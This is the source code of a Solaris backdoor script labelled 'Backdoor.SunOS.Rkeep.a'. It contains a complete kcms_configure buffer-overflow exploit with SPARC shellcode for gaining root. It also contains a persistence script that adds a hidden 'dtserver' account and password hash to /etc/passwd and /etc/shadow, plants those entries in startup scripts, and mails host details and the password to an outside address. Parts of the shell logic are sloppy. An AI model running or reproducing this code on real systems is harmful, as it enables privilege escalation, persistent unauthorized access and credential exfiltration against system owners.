Backdoor.SunOS.Rkeep.a - Source Code

1. ################################################
2. #
3. # !/bin/sh
4. # Rootkeep version *somefin_r33t_goes_here*
5. # Gain root via kcms.. Follow instructions and
6. # script will ensure an instant backdoor every
7. # reboot. Fscking Solaris start-up scripts suck
8. # Code for KCMS was chopped up by Shadow Pengiun
9. # Society
10. # @rwxr--r-- #unixgods (efnet)
11. #
12. ################################################
13.  
14. cat > kcms.c << EOF
15.  
16. #define ENV         "NETPATH="
17. #define MAXBUF      3000
18. #define RETADR      2116
19. #define RETOFS      0x1300
20. #define EXPADR      1200
21. #define FAKEADR1    2092
22. #define FAKEADR2    2112
23. #define NOP         0xa61cc013
24.  
25. char exploit_code[] =
26. "\x82\x10\x20\x17\x91\xd0\x20\x08"
27. "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
28. "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
29. "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
30. "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
31. "\x82\x10\x20\x3b\x91\xd4\xff\xff";
32.  
33. unsigned long get_sp(void)
34. {
35. __asm__("mov %sp,%i0 \n");
36. }
37.  
38. main()
39. {
40.     char            buf[MAXBUF];
41.     unsigned int    i,ip,sp;
42.  
43.     putenv("LANG=");
44.     sp=get_sp();
45.     printf("ESP =0x%x\n",sp);
46.  
47.     for (i=0;i<MAXBUF-4;i+=4){
48.         buf[i+3]=NOP&0xff;
49.         buf[i+2]=(NOP>>8)&0xff;
50.         buf[i+1]=(NOP>>16)&0xff;
51.         buf[i  ]=(NOP>>24)&0xff;
52.     }
53.  
54.     ip=sp;
55.     printf("FAKE=0x%x\n",sp);
56.     buf[FAKEADR1+3]=ip&0xff;
57.     buf[FAKEADR1+2]=(ip>>8)&0xff;
58.     buf[FAKEADR1+1]=(ip>>16)&0xff;
59.     buf[FAKEADR1  ]=(ip>>24)&0xff;
60.     buf[FAKEADR2+3]=ip&0xff;
61.     buf[FAKEADR2+2]=(ip>>8)&0xff;
62.     buf[FAKEADR2+1]=(ip>>16)&0xff;
63.     buf[FAKEADR2  ]=(ip>>24)&0xff;
64.  
65.     ip=sp-RETOFS;
66.     printf("EIP =0x%x\n",sp);
67.     buf[RETADR+3]=ip&0xff;
68.     buf[RETADR+2]=(ip>>8)&0xff;
69.     buf[RETADR+1]=(ip>>16)&0xff;
70.     buf[RETADR]=(ip>>24)&0xff;
71.  
72.     strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));
73.  
74.     strncpy(buf,ENV,strlen(ENV));
75.     buf[MAXBUF-1]=0;
76.     putenv(buf);
77.  
78.     execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
79. }
80.  
81. EOF
82.  
83. echo "Please wait"
84. gcc kcms.c -o /usr/dt/examples/dtdnd
85. chmod +x /usr/dt/examples/dtdnd
86.  
87. # This retains your root shell by piecing
88. # echo'd predefined user and password into
89. # separate Solaris start up scripts which
90. # we all know are a nightmare...
91.  
92. cat > dtwsm << EOF
93.  
94. #!/bin/sh
95. # rootkeep v.1
96. # sil@antioffline.com
97.  
98. USER="dtserver:x:2012:2012::/usr/dt:/bin/sh"
99. MAIL="intrusion@engineer.com"
100. PATH=/usr/dt/examples
101. FILE1=/etc/rc2.d/K40syslog
102. FILE2=/usr/platform/sun4u/lib/flash-update.sh
103. HOST=ifconfig -a
104. PASS=/etc/passwd
105. SHAD=/etc/shadow
106. STRN="dtserver:uFBzOiICo3deU:11107:7:91:28:::"
107. # string equates to p4$sW3rD
108. WORD="p4$sW3rD"
109. if test -n grep dtserver $PASS
110.  
111.     then echo $HOST is already backdoored >> /usr/dt/examples/dtinfo;
112.     mail -s dtserver $MAIL < /usr/dt/examples/dtinfo;
113. else
114.  
115.     echo $USER >> $PASS;
116.     echo $STRN >> $SHAD;
117.     mail -s dtserver MAIL < /usr/dt/examples/dtinfo
118.  
119. fi
120.  
121. if test -n grep $STRN $SHAD
122.  
123. then echo Password is set to $WORD | mail -s dtserver $MAIL
124.  
125. else
126.     echo "echo dtserver:x:2012:2012::/usr/dt:/bin/sh" >> $FILE1;
127.     echo "echo dtserver:uFBzOiICo3deU:11107:7:91:28:::" >> $FILE2;
128.     mail -s dtsrm -f /usr/dt/example/dtd
129.  
130. fi
131. EOF
132.  
133. chmod +x dtdnd
134. mv dtdnd /usr/dt
135. /usr/dt/examples/./dtdnd
136.  
137. echo "Now type /usr/dt/examples/./dtwsm and your set...."